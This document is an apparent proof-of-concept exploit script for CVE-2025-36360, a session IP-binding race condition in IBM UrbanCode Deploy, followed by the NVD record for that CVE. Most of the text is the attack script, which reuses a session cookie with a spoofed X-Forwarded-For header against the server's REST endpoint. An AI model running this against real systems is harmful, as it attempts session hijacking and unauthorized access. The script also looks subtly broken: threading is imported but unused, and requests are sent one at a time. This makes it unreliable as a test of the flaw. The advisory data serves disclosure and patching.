CVE-2025-36360

#!/usr/bin/env python3 """ CVE-2025-36360 PoC - IBM UrbanCode Deploy Session IP Binding Race Condition Note: This is a conceptual PoC for educational and security testing purposes only. """ import requests import time import threading # Configuration TARGET_URL = "https://your-ibm-ucd-server.com" SESSION_TOKEN = "your-valid-session-token" ATTACKER_IP = "attacker-ip-address" def make_request(url, headers, verify=False): """Make HTTP request with custom headers""" try: response = requests.get(url, headers=headers, verify=verify, timeout=10) return response.status_code, response.text except requests.RequestException as e: return None, str(e) def check_session_validity(): """Check if session is still valid""" headers = { 'Cookie': f'JSESSIONID={SESSION_TOKEN}', 'X-Forwarded-For': ATTACKER_IP, 'User-Agent': 'Security-Scanner/1.0' } url = f"{TARGET_URL}/rest/security/currentUser" return make_request(url, headers) def exploit_race_condition(): """ Exploit the race condition in IP binding enforcement This PoC demonstrates the timing vulnerability """ print("[*] Starting CVE-2025-36360 exploitation...") print(f"[*] Target: {TARGET_URL}") print(f"[*] Attacker IP: {ATTACKER_IP}") # Step 1: Verify initial session validity print("\n[1] Verifying initial session validity...") status, response = check_session_validity() if status == 200: print(f"[+] Session is valid") else: print(f"[-] Session check failed: {status}") return False # Step 2: Attempt rapid requests from different IP print("\n[2] Attempting rapid requests to exploit race condition...") success = False for i in range(10): status, response = check_session_validity() if status == 200: print(f"[+] Request {i+1}: Session accepted from new IP") success = True time.sleep(0.1) # Rapid requests else: print(f"[-] Request {i+1}: Session rejected (status {status})") if success: print("\n[!] Race condition may be exploitable!") print("[!] Session accepted from different IP during time window") return True else: print("\n[*] Race condition not detected or already patched") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-36360 PoC - IBM UrbanCode Deploy") print("Race Condition in Session IP Binding") print("=" * 60) exploit_race_condition()

{"cve": {"id": "CVE-2025-36360", "sourceIdentifier": "[email protected]", "published": "2025-12-15T20:15:50.237", "lastModified": "2025-12-18T18:00:06.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM UCD - IBM UrbanCode Deploy 7.1 through 7.1.2.27, 7.2 through 7.2.3.20, and 7.3 through 7.3.2.15 and IBM UCD - IBM DevOps Deploy 8.0 through 8.0.1.10, and 8.1 through 8.1.2.3 is susceptible to a race condition in http-session client-IP binding enforcement which may allow a session to be briefly reused from a new IP address before it is invalidated, potentially enabling unauthorized access under certain network conditions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:devops_deploy:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0.0", "versionEndExcluding": "8.0.1.11", "matchCriteriaId": "566A98BF-76EF-4D0F-9F18-B0EADEDC9FDE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:devops_deploy:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.1.0.0", "versionEndExcluding": "8.1.2.4", "matchCriteriaId": "749B35C4-217A-4507-A9FB-85C7907D837B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:urbancode_deploy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1.0.0", "versionEndExcluding": "7.1.2.28", "matchCriteriaId": "ECFA32A6-29C3-40DD-9D89-F496104E6DBD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:urbancode_deploy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0.0", "versionEndExcluding": "7.2.3.21", "matchCriteriaId": "019C63D6-3DDA-432D-8D7D-62801E732796"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:urbancode_deploy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3.0.0", "versionEndExcluding": "7.3.2.16", "matchCriteriaId": "B633DCF4-FB02-4081-A2E1-E38050C5EF04"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7254661", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}